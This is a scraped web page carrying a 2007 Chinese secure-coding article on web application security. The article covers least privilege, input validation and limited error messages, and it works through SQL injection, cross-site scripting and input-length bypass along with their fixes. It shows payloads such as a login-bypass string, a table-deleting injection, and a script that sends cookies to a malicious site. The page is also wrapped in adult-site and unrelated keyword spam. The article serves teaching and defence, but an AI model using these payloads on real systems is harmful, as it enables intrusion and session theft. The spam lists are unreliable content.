成人在线你懂的-成人在线免费小视频-成人在线免费网站-成人在线免费视频观看-日韩精品国产一区二区-日韩精品国产一区

掃一掃
關(guān)注微信公眾號

權(quán)衡安全和功能 編寫安全的Web2.0應(yīng)用
2007-04-12   CCW

開發(fā)人員必須權(quán)衡好安全和功能之間的關(guān)系,這要看某種攻擊得逞的可能性有多大、這個系統(tǒng)有多重要。開發(fā)人員必須權(quán)衡好安全和功能之間的關(guān)系,這要看某種攻擊得逞的可能性有多大、這個系統(tǒng)有多重要。盡量減小權(quán)限;對訪問資源的賬戶進(jìn)行配置時,始終要把這些賬戶的權(quán)限限制在需要的最小權(quán)限。千萬不要相信用戶的輸入,驗證任何輸入的內(nèi)容; 這對Web應(yīng)用程序來說尤為重要。確保應(yīng)用程序并不依賴客戶端的驗證。在服務(wù)器上應(yīng)當(dāng)重復(fù)所有的檢查工作,因為要是沒有約束條件,比較容易構(gòu)建網(wǎng)頁副本,有可能導(dǎo)致破壞性代碼在運行,或者導(dǎo)致引起系統(tǒng)崩潰的拒絕服務(wù)(DoS)攻擊。
  開發(fā)人員必須權(quán)衡好安全和功能之間的關(guān)系,這要看某種攻擊得逞的可能性有多大、這個系統(tǒng)有多重要。

  開發(fā)人員可以運用諸多基本原則來增強(qiáng)Web應(yīng)用程序的安全性。主要有以下三條原則:

  盡量減小權(quán)限

  對訪問資源的賬戶進(jìn)行配置時,始終要把這些賬戶的權(quán)限限制在需要的最小權(quán)限。

  千萬不要相信用戶的輸入,驗證任何輸入的內(nèi)容

  這對Web應(yīng)用程序來說尤為重要。確保應(yīng)用程序并不依賴客戶端的驗證。在服務(wù)器上應(yīng)當(dāng)重復(fù)所有的檢查工作,因為要是沒有約束條件,比較容易構(gòu)建網(wǎng)頁副本,有可能導(dǎo)致破壞性代碼在運行,或者導(dǎo)致引起系統(tǒng)崩潰的拒絕服務(wù)(DoS)攻擊。

  有節(jié)制地使用錯誤消息

  雖然在開發(fā)程序時,詳細(xì)的錯誤消息很有幫助,但它們對惡意用戶來說同樣是寶貴的信息來源。所以指定函數(shù)名這類細(xì)節(jié)沒有太大的意義。這樣的細(xì)節(jié)記錄在另一個日志中比較好。

  下面幾個示例介紹了沒有經(jīng)過驗證的用戶輸入如何被壞人利用的具體情況,并且介紹了避免這些問題的建議。

  SQL注入

  如果允許任意的SQL命令執(zhí)行,就會出現(xiàn)SQL注入(SQL injection)。當(dāng)SQL語句在代碼里面動態(tài)構(gòu)建時,通常會出現(xiàn)這種情況。

  以下面用C#編寫的代碼為例,該代碼試圖檢查用戶名/密碼組合是否正確:

  string username = txtUsername.Text;

  string password = txtPassword.Text;

  string SQL = "SELECT * FROM tblUsers

  WHERE username = '"+ username +"'

  AND password = '"+ password + "';";

  //執(zhí)行SQL

  用戶名和密碼從服務(wù)器端的兩個文本框獲取,并且SQL語句被創(chuàng)建,然后該語句執(zhí)行。如果沒有記錄返回,那么表明用戶輸入的詳細(xì)資料不正確,或者沒有經(jīng)過注冊; 否則用戶可以進(jìn)入到下一個階段。

  如果用戶在兩個文本框里面輸入了Joe和mypassword,那么SQL語句會是:

  SELECT * FROM tblUsers

  WHERE username = 'Joe'

  AND password = 'mypassword';

  這正是開發(fā)人員的意圖。不過要是用戶往密碼文本框里面輸入: ' OR 'a' = 'a,SQL就會是:

  SELECT * FROM tblUsers

  WHERE username = 'Joe'

  AND password = ''

  OR 'a' = 'a';

  現(xiàn)在,密碼不重要了,因為'a'='a'總是正確的。如果用來連接到數(shù)據(jù)庫的賬戶有權(quán)刪除數(shù)據(jù)而不是僅僅有權(quán)讀取數(shù)據(jù),就會出現(xiàn)更糟糕的情形。假設(shè)用戶往密碼文本框里面輸入: '; DELETE FROM tblUsers WHERE 'a' = 'a'。這會得出以下的語句:

  SELECT * FROM tblUsers

  WHERE username = 'Joe'

  AND password = '';

  DELETE FROM tblUsers

  WHERE 'a' = 'a';

  現(xiàn)在,整個用戶表就會被清空。

  防止這類問題主要有兩種辦法。一是,可以使用存儲過程(stored procedure)來執(zhí)行用戶驗證步驟。設(shè)置參數(shù)值時,避免使用單引號等特殊符號,因而不可能為WHERE語句添加額外的斷言(predicate),也不會運行多個SQL語句。譬如說,可以構(gòu)建像下面這樣的存儲過程,接受兩個輸入?yún)?shù)后,返回表明用戶是不是合法用戶的第三個參數(shù):

  CREATE PROCEDURE spCheckUser

  (

  @Username VARCHAR(20),

  @Password VARCHAR(20),

  @IsValid BIT OUTPUT

  )

  AS

  DECLARE @UserCount INT

  SELECT @UserCount = COUNT(*)

  FROM tblUsers

  WHERE Username = @Username

  AND Password = @Password

  IF @UserCount = 1

  SET @IsValid = 1

  ELSE

  SET @IsValid = 0
現(xiàn)在,初始代碼經(jīng)改動后可以使用存儲過程:

  SqlCommand sqlCommand =

  new SqlCommand("spCheckUser");

  SqlParameter sqlParam =

  new SqlParameter("@Username",

  SqlDbType.VarChar, 20)

  sqlParam.Value = txtUsername.Text;

  sqlParam.Direction =

  ParameterDirection.Input;

  sqlCommand.Parameters.Add(sqlParam);

  sqlParam =

  new SqlParameter("@Password",

  SqlDbType.VarChar, 20)

  sqlParam.Value = txtPassword.Text;

  sqlParam.Direction =

  ParameterDirection.Input;

  sqlCommand.Parameters.Add(sqlParam);

  sqlParam =

  new SqlParameter("@IsValid",

  SqlDbType.Bit, 1)

  sqlParam.Direction =

  ParameterDirection.Output;

  sqlCommand.Parameters.Add(sqlParam);

  //執(zhí)行命令,并檢索輸出參數(shù)值

  輸入和輸出參數(shù)使用相關(guān)類型來說明。如今區(qū)別在于,基本的ADO.NET類會把字符串' OR 'a' = 'a當(dāng)成實際用戶的密碼來處理,而不是當(dāng)成可執(zhí)行SQL來處理。

  避免這種安全漏洞的第二種辦法(也適用于所有的用戶輸入)就是,確保特殊字符或者字符串被禁用。對SQL而言,導(dǎo)致問題的那個字符就是單引號,所以如果沒法使用存儲過程,那么就把所有單引號變成雙引號,這可以防止有人構(gòu)建額外的SQL:

  string username = txtUsername.Text;

  string password = txtPassword.Text;

  username = username.Replace("'","''");

  password = password.Replace("'","''");

  string SQL = "SELECT *

  FROM tblUsers

  WHERE username = '"+ username +"'

  AND password = '"+ password +"';";

  //執(zhí)行SQL

  現(xiàn)在,構(gòu)建的SQL成為:

  SELECT *

  FROM tblUsers

  WHERE username = 'Joe'

  AND password = '''

  OR ''a'' = ''a';

  這意味著該用戶沒有被識別。
跨站腳本

  跨站腳本(有時縮寫成XSS)允許來自一個地方的代碼在另一個網(wǎng)站里面運行。正如在大多數(shù)情況下一樣,只要驗證用戶輸入的內(nèi)容就可以避免這問題。以接受HTML格式的帖子的公告牌為例。假定用戶在發(fā)布消息中加入了以下內(nèi)容:

  Hello everyone

 ?。約cript>

  alert("Hi!");

  </script>

  要是不對腳本塊進(jìn)行任何驗證及刪除,這條消息就會出現(xiàn),標(biāo)準(zhǔn)的警告信息也會顯示。假定這個示例沒有惡意,再考慮下一個示例:

  var I = new Image();

  i.src =

  "http://www.maliciousSite.com/save.asp"

  + escape(document.cookie);

  現(xiàn)在,該用戶的cookie會被傳送到惡意網(wǎng)站,然后記錄在網(wǎng)絡(luò)日志里面。這不是原先需要的操作,可能會泄露私人信息,或者讓不懷好意的人以合法用戶的身份登錄到公告牌??梢酝ㄟ^采用正則表達(dá)式來搜索及清除像< script>及其內(nèi)容這些元素的辦法來防止這個問題。
   
  數(shù)據(jù)溢出

  數(shù)據(jù)過多可能會帶來問題,這有兩個原因。一是,因為應(yīng)用程序往往會崩潰,譬如說,如果程序試圖把50個字符寫入到列大小只有40個字符的數(shù)據(jù)庫表,就會引起程序崩潰。顯然,良好的錯誤捕獲方法應(yīng)當(dāng)可以防止這一問題,但如果用戶輸入的是有效內(nèi)容,而且來自可信用戶,那么這個問題往往不會發(fā)生。數(shù)據(jù)過多輕則帶來差勁的用戶體驗,重則導(dǎo)致嚴(yán)重消耗服務(wù)器資源,要是問題頻頻發(fā)生,還會導(dǎo)致整個服務(wù)無法使用。如果輸入內(nèi)容專門旨在導(dǎo)致錯誤、機(jī)器過載,這就叫拒絕服務(wù)(DoS)攻擊。
  
  第二個問題是緩沖器溢出。有時候,輸入的數(shù)據(jù)會溢出旨在存放它的內(nèi)存區(qū),而成為可執(zhí)行代碼的一部分。只要對輸入到輸入框中的數(shù)據(jù)進(jìn)行精心設(shè)計,攻擊者就可以在服務(wù)器上執(zhí)行任意代碼。

  為了避免該問題,不要依靠客戶端技術(shù),譬如設(shè)置文本框的最大長度屬性。這很容易被跳過。有些瀏覽器(包括IE在內(nèi))允許javascript URL。如果網(wǎng)頁的文本框有一個標(biāo)為txtSurname的id,那么下列代碼拷貝到瀏覽器的地址欄上后,就會改變最大長度屬性:

  javascript:document.getElementById

  ("txtSurname").maxLength = 1000

  防止這個問題的方法仍然是在服務(wù)器上進(jìn)行檢查,看看輸入內(nèi)容是否超過所需長度; 必要的話縮減輸入內(nèi)容。(作者單位系河南省鎮(zhèn)平縣教師進(jìn)修學(xué)校)

熱詞搜索:

上一篇:系統(tǒng)安全:利用了系統(tǒng)的什么惡意網(wǎng)頁如此橫行霸道
下一篇:熟知威脅電子郵件安全的25個常見錯誤

分享到: 收藏
主站蜘蛛池模板: 乱世危情电视剧演员表| 狂野殴美激情性bbbbbb| 欧若拉公主电视剧国语版全集在线观看| 郭云飞| 彻夜之歌为什么被禁| 豆腐西施杨七巧 演员表| 风花电影完整版免费观看| 姐姐的秘密电影| 李截| junk boy| 杨剑锋个人资料简介| 韩国最火主播朴曼妮| 追龙演员表全部名单| 张寿懿| 铠甲勇士第六部| 美丽的坏女人中文字幕| 老司机免费视频在线观看| 孕妇照几个月拍最好| 少女第一季| 文艺部面试提问问题| 最佳女婿 电影| 动物聚会美术图片| 王茜华泳装照片高清| 欧美变态挠痒痒视频∨k| 夜魔3| 金政| 狼来了电影免费观看| 诱惑的艺术| kaya| 北京卫视手机直播| 仓皇一夜| juliet stevenson| 不死法医第一季在线观看免费完整版| 电车悖论完美答案| 德爱白金奶粉| naughty america| 电影男女| 考马斯亮蓝法测定蛋白质含量| 附身美女| 新步步惊心| 相声剧本(适合学生)|